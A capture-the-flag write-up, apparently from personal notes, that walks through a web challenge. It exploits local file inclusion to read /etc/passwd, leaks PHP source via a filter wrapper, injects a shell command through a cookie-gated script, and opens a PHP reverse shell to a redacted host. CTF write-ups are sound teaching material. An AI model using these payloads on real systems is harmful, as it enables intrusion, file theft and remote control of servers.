Loading up the site, we see file=wc.php. Any time I see something like this I always check for LFI.  `http://chall.csivit.com:30202/?file=../../../etc/passwd`  So LFI is in play. Let's use the php filter wrapper and grab the source of the wc.php file. `http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php` After decoding the b64, we can get a look at what's going on under the hood.  So our cookie needs to match the PASSWORD environment variable for us to get any further. Fortunately, robots.txt has a neat disallow.  Using the same method that we used to get the source of wc, we can get the source of checkpass  There's the password. Let's edit our cookie so we can proceed. Going back to the source of wc.php, we can see the command it's running, so all we need to do is inject our own command into it. `'; whoami #'` '; to escape and end the previous command, whoami- our command, # to comment out the rest of the command  Command injection is in play. Let's get a reverse shell. `'; php -r '$sock=fsockopen("REDACTED",4444);exec("/bin/sh -i <&3 >&3 2>&3");' #'` Now that we're in, browsing around the filesystem I found this directory  And inside that directory is...  cracked hash = csictf Let's switch to the ctf user and browse some of these files  --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #lfi #php #php_filter #rce #web #ctf #command_injection Related: